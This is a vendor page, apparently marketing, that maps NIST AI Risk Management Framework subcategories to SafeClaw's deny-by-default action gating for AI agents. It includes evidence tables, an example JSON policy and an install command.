NIST AI Risk Management Framework Mapped to Action-Level Gating
Regulation Overview
The NIST AI Risk Management Framework (AI RMF 1.0, NIST AI 100-1, January 2023) provides a voluntary framework for managing risks associated with AI systems throughout their lifecycle. It defines four core functions — Govern, Map, Measure, and Manage — with subcategories and suggested actions. While not a regulation, the AI RMF is referenced by federal agencies, procurement requirements, and is increasingly adopted as a de facto standard for AI risk management in the United States. Executive Order 14110 (October 2023) directs federal agencies to adopt the AI RMF for AI governance.
Relevant Requirements
GOVERN 1.1 — Legal and Regulatory Requirements
Organizations identify legal and regulatory requirements applicable to the AI system, including sector-specific regulations. This maps to identifying what controls AI agents need based on the domain they operate in.
GOVERN 1.5 — Ongoing Monitoring
Mechanisms are in place for ongoing monitoring and periodic review of the AI system's trustworthiness. Continuous monitoring of agent actions during operation is required.
MAP 2.1 — Categorize AI System
The AI system is categorized, and its risks are assessed based on the intended purpose, context of use, and potential impacts. Agents with file access, shell execution, and network capabilities must be categorized by action-level risk.
MAP 2.3 — Scientific Integrity and TEVV
Processes for testing, evaluation, verification, and validation (TEVV) are defined and documented. Agent gating policies require testing before deployment.
MEASURE 2.5 — Evaluating AI System Performance
The AI system is evaluated regularly for safety, bias, security, and other trustworthiness characteristics. Agent behavior must be measurable through audit records.
MEASURE 2.6 — Monitoring AI System Behavior
Mechanisms exist to monitor the AI system's behavior in production. Real-time action monitoring provides behavioral observability.
MANAGE 1.1 — Risk Response
A determination is made to deploy, not deploy, or cease use of the AI system based on risk assessment. Action-level gating provides the enforcement mechanism for deploy/not-deploy decisions at the action granularity.
MANAGE 2.2 — Risk Controls
Mechanisms are in place and applied to manage identified risks. Deny-by-default policies with explicit allow rules are risk controls for AI agent operations.
MANAGE 4.1 — Incident Response
Processes are in place to respond to incidents involving the AI system. Denied actions and audit trail analysis support incident detection and response.
Compliance Gap Without Gating
Organizations referencing the NIST AI RMF without action-level agent controls face these gaps:
- GOVERN 1.5 gap — No ongoing monitoring mechanism for AI agent actions during operation
- MAP 2.3 gap — No testing framework to verify agent behavior controls before deployment
- MEASURE 2.6 gap — No production monitoring of individual agent actions
- MANAGE 2.2 gap — No enforceable risk controls at the action level
- MANAGE 4.1 gap — No audit trail for incident detection or forensic analysis
- Federal procurement risk — Agencies following EO 14110 may require AI RMF alignment for vendor AI systems
How SafeClaw Addresses Each Requirement
| AI RMF Function | Subcategory | SafeClaw Capability |
|---|---|---|
| GOVERN 1.1 | Identify legal requirements | Policy configurations can encode regulatory requirements (GDPR, HIPAA, PCI DSS) as enforceable agent rules. Cross-references to regulation-specific policies. |
| GOVERN 1.5 | Ongoing monitoring | Dashboard at safeclaw.onrender.com provides continuous visibility into agent actions. Audit trail records every action for periodic review. |
| MAP 2.1 | Categorize AI system | Four action types (file_read, file_write, shell_exec, network) categorize agent capabilities. Each type can be independently controlled by risk level. |
| MAP 2.3 | TEVV processes | Simulation mode allows testing policies against real workflows without enforcement. 446 tests under TypeScript strict mode verify gating engine correctness. |
| MEASURE 2.5 | Performance evaluation | Audit trail exports enable periodic evaluation of agent actions against expected behavior patterns. |
| MEASURE 2.6 | Production monitoring | Real-time action logging with sub-millisecond evaluation latency. Every action request logged before execution. |
| MANAGE 1.1 | Deploy/not-deploy decision | Deny-by-default architecture means the system starts in a not-deployed (no access) state. Each allow rule is an explicit deploy decision for that action. |
| MANAGE 2.2 | Risk controls | Policy rules are enforceable risk controls. First-match-wins evaluation provides deterministic risk management outcomes. |
| MANAGE 4.1 | Incident response | SHA-256 hash-chained audit trail provides tamper-proof incident investigation records. Denied action logs identify potential security events. |
Evidence Generation
| AI RMF Function | Evidence Required | SafeClaw Output |
|---|---|---|
| GOVERN 1.5 | Monitoring system documentation | Dashboard access records; audit trail configuration documentation |
| MAP 2.1 | System categorization records | Action type inventory; per-type risk assessment policies |
| MAP 2.3 | TEVV results | Simulation mode test outputs; 446-test suite results |
| MEASURE 2.5 | Performance evaluation reports | Periodic audit trail analysis reports |
| MEASURE 2.6 | Production monitoring logs | Hash-chained audit trail with every action decision |
| MANAGE 1.1 | Deploy/not-deploy documentation | Policy configurations showing which actions are allowed (deployed) vs denied (not deployed) |
| MANAGE 2.2 | Risk control documentation | Policy files with rule-by-rule risk justifications |
| MANAGE 4.1 | Incident response logs | Denied action reports; hash chain verification for forensic integrity |
The control plane receives only action metadata, never file contents or sensitive data. This data minimization supports MANAGE 2.2 risk control principles for the gating tool itself.
Example Policy
A NIST AI RMF-aligned policy demonstrating risk-tiered agent control:
{
"name": "nist-rmf-tiered-agent",
"defaultAction": "deny",
"rules": [
{
"action": "file_read",
"path": "/app/data/low-risk/**",
"decision": "allow",
"reason": "MAP 2.1 — Low-risk data, automated access appropriate"
},
{
"action": "file_read",
"path": "/app/data/high-risk/**",
"decision": "deny",
"reason": "MANAGE 1.1 — High-risk data requires human-initiated access"
},
{
"action": "file_write",
"path": "/app/output/**",
"decision": "allow",
"reason": "MANAGE 2.2 — Write restricted to output directory"
},
{
"action": "shell_exec",
"command": "python /app/scripts/validated_*.py",
"decision": "allow",
"reason": "MAP 2.3 — Only TEVV-validated scripts permitted"
},
{
"action": "shell_exec",
"decision": "deny",
"reason": "MANAGE 2.2 — Arbitrary shell execution outside risk tolerance"
},
{
"action": "network",
"host": "api.internal.org",
"decision": "allow",
"reason": "MANAGE 2.2 — Internal API only"
}
]
}
Install with npx @authensor/safeclaw. Zero third-party dependencies and 100% open-source client (MIT license) support MAP 2.3 TEVV requirements — the entire enforcement mechanism is auditable. The free tier with 7-day renewable keys enables risk assessment before production commitment.
Audit Trail Export
For NIST AI RMF conformity documentation:
- Document the GOVERN function — Include policy configurations showing how regulatory requirements map to agent rules
- Export simulation mode results — MAP 2.3 TEVV evidence of pre-deployment testing
- Export production audit trail — MEASURE 2.6 evidence of ongoing monitoring
- Generate denied action analysis — MANAGE 4.1 incident detection capability evidence
- Verify hash chain integrity — Demonstrates tamper-proof record-keeping across all functions
Cross-References
- SafeClaw FAQ: Enterprise Compliance — NIST AI RMF alignment questions
- Simulation Mode Reference — TEVV testing capabilities
- Policy Engine Architecture — First-match-wins risk control mechanism
- Compare: Pre-Execution vs Post-Execution — Why pre-execution gating satisfies MANAGE functions
- ISO 27001 Agent Security — Complementary international standard mapping
Try SafeClaw
Action-level gating for AI agents. Set it up in your browser in 60 seconds.
$ npx @authensor/safeclaw